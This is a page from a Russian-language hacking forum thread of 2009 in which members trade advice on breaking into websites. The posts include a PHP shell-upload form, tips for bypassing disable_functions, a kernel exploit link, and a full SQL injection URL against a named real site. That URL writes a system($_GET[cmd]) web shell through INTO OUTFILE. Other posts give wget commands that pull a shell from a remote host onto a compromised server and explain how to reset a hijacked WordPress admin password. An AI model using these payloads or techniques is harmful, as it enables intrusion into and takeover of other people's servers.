Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    <form action="shell.php?lol=copy($_FILES[file][tmp_name], $_GET[bob]);&bob=./shell.php
    " method="post" enctype="multipart/form-data">
    <input type="file" name="file">
    <input type="submit" value="upload">
    </form>
    В этом проекте и наш ettee участвовал :)
     
    #10341 Ctacok, 29 Nov 2009
    Last edited: 29 Nov 2009
    2 people like this.
  2. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    залил шелл и получил доступ к wordpress. Теперь как мне изменит пасс админа типа:

    $P$BVL7LPklZHMxVRnuBywE0fTV4d40SU.

    надо заменит на свой но не знаю чем кодироват свой пасс для вордпресса
     
  3. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    Юзай PasswordsPro или поставь wp с нужным паролем на локалхост и вынь пароль через phpmyadmin
     
  4. eliteload

    eliteload New Member

    Joined:
    22 Oct 2009
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    disable_functions
    возможно ли выполнять системные команды, с такой конфигурацией php.ini? если да, то как?
     
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Попробуй
    PHP:
    <?=`ls`?>
    но не факт, т.к. это аналог shell_exec, вроде...
     
    #10345 mailbrush, 29 Nov 2009
    Last edited: 29 Nov 2009
  6. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    именно.
    Поэтому попробуй заюзать popen.
     
    1 person likes this.
  7. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    http://www.insidepro.com/hashes.php?lang=rus --> MD5(Wordpress)
     
  8. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    спс уже нашел вот http://onlinefunctions.net/wordpress-hash-generator.html
     
  9. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Подскажите, может кто-то видел эксплоит на
    uname -a: Linux 2.6.27.12-170.2.5.fc10.i686 #1 SMP Wed Jan 21 02:09:37 EST 2009 i686
     
  10. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    http://milw0rm.com/exploits/9479
     
    1 person likes this.
  11. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Сори,что тут пишу, вопрос в один ответ. подскажите плз файл-сервер с прямой ссылкой на закачаный мной файл.
     
  12. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    давно хотел спросить... и вот наконец решился) вообщем ситуация такая....
    сервак работает под рутом!
    залил с помощю into outfile в /tmp/freek8.php сстроку такого содержания-->


    <? php system($_GET[cmd]); ?>

    http://www.motorama.be/show.php?id=-117+union+select+1,2,0x3c3f207068702073797374656d28245f4745545b636d645d293b203f3e,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user+into+outfile+'/tmp/freek8.php'/*

    потом проверил записалось ли...
    http://www.motorama.be/show.php?id=-117+union+select+1,2,load_file('/tmp/freek8.php'),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

    но теперь то што дальше? я так понимаю надо раскрыть полный путь к файлу /tmp/freek8.php
    какие есть способы?
    вообщем подсказуйте хто што знает)
     
    #10352 547, 30 Nov 2009
    Last edited: 30 Nov 2009
  13. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Что значит сервак работает под рутом? у веб сервера id=0? Сомневаюсь... Отсюда вопрос:
    а права web сервера пустят тебя в эту папку?

    Найди путь к сайту и залей шелл туда.
    Права у базы - рут,насколько я понял - это не рут системы...
     
    #10353 p.r0phe.t, 30 Nov 2009
    Last edited: 30 Nov 2009
  14. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    это и есть полный путь к директории.
    Найди в скриптах сайта ошибку,которая выдаст путь к директории сайта,либо через тот же лоадфайл перебором, и лей шелл туда. Как от веб сервера обратиться к папке темп сам бы послушал,если такое возможно. Думаю функцией include,которую опять же нужно найти.
     
    #10354 p.r0phe.t, 30 Nov 2009
    Last edited: 30 Nov 2009
    1 person likes this.
  15. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Он же расписал все по пунктам.

    1. Юзаем тулзу от меднета http://madnet.name/tools/madss/, которая сканит сайт.
    2. Видим там это, http://cacpe.be/index.php?page[]=, то есть раскрытие путей.
    3. Льем шелл не в папку /tmp, а папку, которую показало нам раскрытие, и которая доступна из веба, то есть
    Code:
    Warning: Illegal offset type in isset or empty in [B][COLOR=Red]/var/www/html/index.php[/COLOR] [/B]on line 118
    _______
    А, ну да, madss показывает соседей + директории)
    _______
    Либо у меня руки кривые, либо он через sock_sendpage() не рутается)
    _______
    Да нет, все таки у меня руки кривые, ибо кто-то уже чмод 777 / -R выполнил)
     
    #10355 mailbrush, 30 Nov 2009
    Last edited: 30 Nov 2009
    1 person likes this.
  16. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    wget -O /papka/na/servere/shell.php http://shell.in/shell.txt
     
    #10356 RulleR, 30 Nov 2009
    Last edited: 30 Nov 2009
  17. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    wget -O
    Регист важен.
     
    1 person likes this.
  18. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Сразу видно ты команду ниразу не юзал:

    Code:
    wget http://ya.ru/index.html [COLOR=DarkOrange]-o[/COLOR] 1.txt - поместит лог работы в 1.txt
    wget http://ya.ru/index.html [COLOR=DarkOrange]-O[/COLOR] 1.txt - сохранит файл в 1.txt
     
  19. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    правильно?
    wget http://site.ru/shell.txt -O http://www.motorama.be/shell.php

    где www.motorama.be/shell.php сайт куда надо загрузить шелл...

    а wget http://site.ru/shell.txt

    сайт где лежит код шелла...
     
    #10359 547, 1 Dec 2009
    Last edited: 1 Dec 2009
    1 person likes this.
  20. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    неправильно.
    для того чтобы это было правильным, у программы wget должны были бы быть следующие возможности:
    - определяет что за веб-сервер установлен
    - ищет его конфиги
    - находит в конфигах полный путь к директории сервера
    - вычисляет куда, наконец, сохранить этот злополучный shell.php
    - сохраняет его туда
    Вам не кажется что это многовато для простой утилиты?
     
Thread Status:
Not open for further replies.